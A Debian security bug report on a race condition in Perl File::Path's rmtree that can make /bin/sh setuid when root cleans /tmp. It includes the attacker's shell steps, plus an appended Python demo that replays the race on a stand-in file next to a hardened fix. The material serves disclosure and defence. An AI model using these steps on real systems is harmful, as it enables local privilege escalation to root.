Updated: 2022-09-19 22:09:01
Package: perl-modules
Version: 5.6.1-8.7
Severity: critical
File: /usr/share/perl/5.6.1/File/Path.pm
Tags: security
Justification: root security hole
Noting USN-44-1 e.g. in
http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0385.html
I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree contains
a race condition, allowing creation of setuid files:
   170     (undef, undef, my $rp) = lstat $root or next;
   171     $rp &= 07777;   # don't forget setuid, setgid, sticky bits
   172     if ( -d _ ) {
   ...
   209         if (rmdir $root) {
   210             ++$count;
   211         }
   212         else {
   213             carp "Can't remove directory $root: $!";
   214             chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root))
   215                 or carp("and can't restore permissions to "
   216                         . sprintf("0%o",$rp) . "\n");
   217         }
   218     }
   ...
Example of attack: suppose we know that root uses rmtree to clean up
/tmp directories. Attacker prepares things:
    mkdir -p /tmp/psz/sh
    perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)'
    chmod 4777 /tmp/psz/sh
While root is busy working on /tmp/psz/sh (and this can be made as slow
as we like), attacker does:
    mv /tmp/psz/sh /tmp/psz/dummy
    ln -s /bin/sh /tmp/psz/sh
Root would have recorded the permissions of /tmp/psz/sh, but would
"restore" it to /bin/sh.
I am not sure if things can almost be fixed (for those architectures
without $force_writeable) by enclosing the chmod($rp,...) line within
if(!safe|$force_writeable){...}. Maybe it should be documented that
rmtree must only be used if you can be sure to have exclusive access to
the tree.
(A few minutes ago I emailed the File::Path authors Tim.Bunce@ig.co.uk
and bailey@newman.upenn.edu; Tim.Bunce bounced.)
Cheers,
Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686
Locale: LANG=C, LC_CTYPE=C
Versions of packages perl-modules depends on:
ii perl 5.6.1-8.7 Larry Wall's Practical Extraction
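The race described in the report, replayed as an added example (this is not code from the bug report, from File::Path or from Debian). Python is used instead of Perl so the demonstration runs and checks itself; the file-system calls involved (lstat, chmod, rename, symlink, fchmod) are the same ones rmtree would make. A throw-away file named victim_sh stands in for /bin/sh and a temporary directory stands in for /tmp; the "psz/sh" directory, the saved mode 04755 and the hardened safe_restore() routine are all constructed for the example. The vulnerable variant is the File::Path 1.04 pattern of lstat-by-name followed by chmod-by-name; the hardened variant opens the directory with O_NOFOLLOW|O_DIRECTORY, checks that the inode is still the one that was lstat'ed, and applies the saved bits with fchmod on the descriptor.

```python
import os
import stat
import tempfile


def record_mode(path):
    """rmtree's first step: lstat the entry and remember its permission
    bits (07777, so setuid/setgid/sticky survive) plus its identity."""
    st = os.lstat(path)
    return stat.S_IMODE(st.st_mode), (st.st_dev, st.st_ino)


def vulnerable_restore(path, saved_mode):
    """The File::Path 1.04 pattern: chmod by *name*.  If the name has
    since been replaced by a symlink, chmod follows it and the saved
    bits land on whatever the link points at."""
    os.chmod(path, saved_mode)


def safe_restore(path, saved_mode, expected_identity):
    """Hardened variant (constructed for this example, not File::Path
    code): open the directory itself without following symlinks, make
    sure it is still the same inode that was lstat'ed, then fchmod the
    descriptor.  Returns True on success, False if the entry was
    swapped out from under us."""
    flags = os.O_RDONLY | os.O_NOFOLLOW | getattr(os, "O_DIRECTORY", 0)
    try:
        fd = os.open(path, flags)
    except OSError:  # ELOOP (now a symlink) or ENOTDIR (now a file)
        return False
    try:
        st = os.fstat(fd)
        if (st.st_dev, st.st_ino) != expected_identity:
            return False  # same name, different object: do not touch it
        os.fchmod(fd, saved_mode)
        return True
    finally:
        os.close(fd)


def swap_in_symlink(base, target):
    """The attacker's move between the lstat and the chmod:
         mv psz/sh psz/dummy ; ln -s <target> psz/sh"""
    os.rename(os.path.join(base, "sh"), os.path.join(base, "dummy"))
    os.symlink(target, os.path.join(base, "sh"))


def run_race_demo():
    """Replay the scenario once per restore strategy and report the
    resulting permission bits of the stand-in target."""
    results = {}
    for label in ("vulnerable", "safe"):
        with tempfile.TemporaryDirectory() as tmp:
            # Constructed stand-in for /bin/sh: a 0755 file we own.
            target = os.path.join(tmp, "victim_sh")
            with open(target, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(target, 0o755)

            # Attacker's preparation: a setuid directory rmtree will visit.
            base = os.path.join(tmp, "psz")
            sh_dir = os.path.join(base, "sh")
            os.makedirs(sh_dir)
            os.chmod(sh_dir, 0o4755)

            # rmtree records the bits it will "restore" if rmdir fails.
            saved_mode, identity = record_mode(sh_dir)

            # While rmtree is busy inside the tree, the attacker swaps
            # the directory for a symlink to the target.
            swap_in_symlink(base, target)

            # rmdir of psz/sh has failed (it is no longer a directory),
            # so the permissions get "restored".
            if label == "vulnerable":
                vulnerable_restore(sh_dir, saved_mode)
                restored = True
            else:
                restored = safe_restore(sh_dir, saved_mode, identity)

            results[label] = {
                "saved_mode": saved_mode,
                "restored": restored,
                "target_mode": stat.S_IMODE(os.lstat(target).st_mode),
            }
    return results


if __name__ == "__main__":
    for label, r in run_race_demo().items():
        print("%-10s restored=%-5s target now 0%o" % (label, r["restored"], r["target_mode"]))
```

The demo runs as an unprivileged user because chmod may set the setuid bit on a file the caller owns; the security impact in the report comes from the victim being root, whose chmod succeeds on a root-owned /bin/sh. Note also that the open/fstat/fchmod approach only closes the window on the final chmod; a rmtree that recurses by name still has to treat every other step (the rmdir, the per-entry unlinks) with the same care, which is why the report's suggestion to document the exclusive-access requirement is not unreasonable.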